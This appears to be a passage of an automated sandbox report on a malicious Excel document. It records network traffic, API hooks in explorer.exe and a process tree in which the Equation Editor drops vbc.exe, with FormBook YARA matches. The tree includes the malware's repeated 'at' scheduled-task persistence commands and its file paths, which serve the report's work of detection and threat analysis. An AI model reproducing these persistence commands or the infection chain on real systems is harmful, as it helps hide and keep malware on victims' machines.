61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Apr 12, 2021 07:47:52.435089111 CEST	892	IN	Data Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.22	49174	74.125.143.82	80	C:\Windows\system\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 07:47:54.309803009 CEST	893	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd02.googlecode.com Connection: Keep-Alive
Apr 12, 2021 07:47:54.357358932 CEST	894	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 05:47:54 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
Apr 12, 2021 07:47:54.357371092 CEST	894	IN	Data Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</

HTTPS Packets

Timestamp	Source IP	Source Port	Dest IP	Dest Port	Subject	Issuer	Not Before	Not After	JA3 SSL Client Fingerprint	JA3 SSL Client Digest
Apr 12, 2021 07:47:18.427997112 CEST	52.59.165.42	443	192.168.2.22	49165	CN=*.short.gy CN=R3, O=Let's Encrypt, C=US	CN=R3, O=Let's Encrypt, C=US CN=DST Root CA X3, O=Digital Signature Trust Co.	Sat Jan 23 20:36:49 CET 2021 Wed Oct 07 21:21:40 CEST 2020	Fri Apr 23 21:36:49 CEST 2021 Wed Sep 29 21:21:40 CEST 2021	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Apr 12, 2021 07:47:18.427997112 CEST	52.59.165.42	443	192.168.2.22	49165	CN=R3, O=Let's Encrypt, C=US	CN=DST Root CA X3, O=Digital Signature Trust Co.	Wed Oct 07 21:21:40 CEST 2020	Wed Sep 29 21:21:40 CEST 2021		7dcce5b76c8b17472d024758970a406b
Apr 12, 2021 07:47:43.753707886 CEST	103.67.236.191	443	192.168.2.22	49172	CN=demo.sdssoftltd.co.uk CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon Mar 08 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015	Mon Jun 07 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025	771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,0	7dcce5b76c8b17472d024758970a406b
Apr 12, 2021 07:47:43.753707886 CEST	103.67.236.191	443	192.168.2.22	49172	CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US	CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB	Mon May 18 02:00:00 CEST 2015	Sun May 18 01:59:59 CEST 2025		7dcce5b76c8b17472d024758970a406b

Code Manipulations

User Modules

Hook Summary

Function Name	Hook Type	Active in Processes
PeekMessageA	INLINE	explorer.exe
PeekMessageW	INLINE	explorer.exe
GetMessageW	INLINE	explorer.exe
GetMessageA	INLINE	explorer.exe

Processes

Process: explorer.exe, Module: USER32.dll

Function Name	Hook Type	New Data
PeekMessageA	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE5
PeekMessageW	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE5
GetMessageW	INLINE	0x48 0x8B 0xB8 0x87 0x7E 0xE5
GetMessageA	INLINE	0x48 0x8B 0xB8 0x8F 0xFE 0xE5

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2208 Parent PID: 584

General

Start time:	07:46:45
Start date:	12/04/2021
Path:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Imagebase:	0x13fac0000
File size:	27641504 bytes
MD5 hash:	5FB0A0F93382ECD19F5F499A5CAA59F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: EQNEDT32.EXE PID: 2352 Parent PID: 584

General

Start time:	07:47:06
Start date:	12/04/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: vbc.exe PID: 3012 Parent PID: 2352

General

Start time:	07:47:11
Start date:	12/04/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\Public\vbc.exe'
Imagebase:	0x400000
File size:	379720 bytes
MD5 hash:	AD0C93B574BB947CFF15483EDA82811E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 2464 Parent PID: 3012

General

Start time:	07:47:12
Start date:	12/04/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	c:\users\public\vbc.exe
Imagebase:	0x400000
File size:	167936 bytes
MD5 hash:	ABBFBEC83B67CA488DF807F74D5773B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 2876 Parent PID: 428

General

Start time:	07:47:14
Start date:	12/04/2021
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k WerSvcGroup
Imagebase:	0xff0e0000
File size:	27136 bytes
MD5 hash:	C78655BC80301D76ED4FEF1C1EA40A7D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: icsys.icn.exe PID: 552 Parent PID: 3012

General

Start time:	07:47:22
Start date:	12/04/2021
Path:	C:\Users\user\AppData\Local\icsys.icn.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\icsys.icn.exe
Imagebase:	0x400000
File size:	211759 bytes
MD5 hash:	D5809935B2F8A4579AAADCA96C2920EE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: explorer.exe PID: 2288 Parent PID: 552

General

Start time:	07:47:23
Start date:	12/04/2021
Path:	C:\Windows\system\explorer.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\system\explorer.exe
Imagebase:	0x400000
File size:	211903 bytes
MD5 hash:	65343007BC733953C401ADFE6E510AB7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000008.00000002.2238875594.0000000003DA0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: spoolsv.exe PID: 2004 Parent PID: 2288

General

Start time:	07:47:24
Start date:	12/04/2021
Path:	C:\Windows\system\spoolsv.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\system\spoolsv.exe SE
Imagebase:	0x400000
File size:	211748 bytes
MD5 hash:	817B37415965598BD5AF7AC6AC9A486B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: svchost.exe PID: 1336 Parent PID: 2004

General

Start time:	07:47:24
Start date:	12/04/2021
Path:	C:\Windows\system\svchost.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\system\svchost.exe
Imagebase:	0x400000
File size:	211773 bytes
MD5 hash:	9E2126D03A69C95E6FAE5281AA482ACC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML
Reputation:	low

Chronological Activities

Analysis Process: spoolsv.exe PID: 1320 Parent PID: 1336

General

Start time:	07:47:25
Start date:	12/04/2021
Path:	C:\Windows\system\spoolsv.exe
Wow64 process (32bit):	true
Commandline:	c:\windows\system\spoolsv.exe PR
Imagebase:	0x400000
File size:	211748 bytes
MD5 hash:	817B37415965598BD5AF7AC6AC9A486B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Chronological Activities

Analysis Process: at.exe PID: 2564 Parent PID: 1336

General

Start time:	07:47:25
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 07:50 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x100000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: at.exe PID: 1776 Parent PID: 1336

General

Start time:	07:47:26
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 07:51 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x100000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: taskeng.exe PID: 2328 Parent PID: 860

General

Start time:	07:47:27
Start date:	12/04/2021
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {101D7849-1F13-4446-86DC-A878F583ACDC} S-1-5-18:NT AUTHORITY\System:Service:
Imagebase:	0xff570000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Chronological Activities

Analysis Process: at.exe PID: 2404 Parent PID: 1336

General

Start time:	07:47:27
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 07:53 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x100000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Chronological Activities

Analysis Process: vbc.exe PID: 1756 Parent PID: 2464

General

Start time:	07:47:27
Start date:	12/04/2021
Path:	C:\Users\Public\vbc.exe
Wow64 process (32bit):	true
Commandline:	c:\users\public\vbc.exe
Imagebase:	0x400000
File size:	167936 bytes
MD5 hash:	ABBFBEC83B67CA488DF807F74D5773B7
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.2232316725.0000000000050000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, Author: Joe Security Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.2234254446.0000000000A20000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:	low

Chronological Activities

Analysis Process: at.exe PID: 2956 Parent PID: 1336

General

Start time:	07:47:28
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 07:55 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x100000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: at.exe PID: 2844 Parent PID: 1336

General

Start time:	07:47:29
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 07:57 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x100000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: at.exe PID: 2976 Parent PID: 1336

General

Start time:	07:47:29
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 07:59 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x100000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: at.exe PID: 1696 Parent PID: 1336

General

Start time:	07:47:30
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 08:01 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x100000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: at.exe PID: 2216 Parent PID: 1336

General

Start time:	07:47:31
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 08:03 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x100000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: at.exe PID: 1820 Parent PID: 1336

General

Start time:	07:47:31
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 08:05 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x130000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: at.exe PID: 2268 Parent PID: 1336

General

Start time:	07:47:32
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 08:07 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x100000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: at.exe PID: 288 Parent PID: 1336

General

Start time:	07:47:32
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 08:09 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x100000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: at.exe PID: 2032 Parent PID: 1336

General

Start time:	07:47:33
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 08:11 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x100000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Analysis Process: at.exe PID: 572 Parent PID: 1336

General

Start time:	07:47:34
Start date:	12/04/2021
Path:	C:\Windows\SysWOW64\at.exe
Wow64 process (32bit):	true
Commandline:	at 08:13 /interactive /every:M,T,W,Th,F,S,Su c:\windows\system\svchost.exe
Imagebase:	0x100000
File size:	24064 bytes
MD5 hash:	7BD932FFA2E9B359CB0544615973D149
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: vbc.exe PID: 3012 Parent PID: 2352 vbc.exeCOMMON

Executed Functions

Function 0041E9D0, Relevance: 25.6, APIs: 17, Instructions: 78COMMON

Download Yara Rule

APIs

__vbaChkstk.MSVBVM60(00000000,Function_000032B6), ref: 0041E9EE
__vbaOnError.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA1E
#525.MSVBVM60(000000FF,?,?,?,00000000,Function_000032B6), ref: 0041EA30
__vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA3B
__vbaLenBstr.MSVBVM60(?,?,?,?,00000000,Function_000032B6), ref: 0041EA4C
__vbaStrToAnsi.MSVBVM60(?,?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA61
GetUserNameA.ADVAPI32(00000000), ref: 0041EA6D
__vbaStrToUnicode.MSVBVM60(?,?,?,?,?,00000000,Function_000032B6), ref: 0041EA7B
__vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EA84
#537.MSVBVM60(00000000,?,00000001,?,?,?,00000000,Function_000032B6), ref: 0041EA99
__vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAA4
__vbaInStr.MSVBVM60(00000000,00000000,?,?,?,00000000,Function_000032B6), ref: 0041EAAD
#616.MSVBVM60(?,-00000001,?,?,?,00000000,Function_000032B6), ref: 0041EABD
__vbaStrMove.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAC8
__vbaFreeStr.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EAD1
__vbaFreeStr.MSVBVM60(0041EB05,?,?,?,00000000,Function_000032B6), ref: 0041EAFE
__vbaErrorOverflow.MSVBVM60(?,?,?,00000000,Function_000032B6), ref: 0041EB19

Memory Dump Source

Source File: 00000004.00000002.2183857173.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000004.00000002.2183852517.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.2184004866.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.2184014265.000000000042E000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$FreeMove$Error$#525#537#616AnsiBstrChkstkNameOverflowUnicodeUser
String ID:
API String ID: 281739284-0
Opcode ID: 51ebf8c25856d226b4dcde5673b463cf0edb45b4d208a7711fc342866f12040b
Instruction ID: 1a108948efa492097ea428c0624f2b892237f430c038d1a03950295591b49aee
Opcode Fuzzy Hash: 51ebf8c25856d226b4dcde5673b463cf0edb45b4d208a7711fc342866f12040b
Instruction Fuzzy Hash: 5D31CA75900249EFDB04EFA4DE4DBDEBBB8EB08715F108269E502B62A0DB745944CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0040A840, Relevance: 809.7, APIs: 448, Strings: 13, Instructions: 2988COMMON

Download Yara Rule
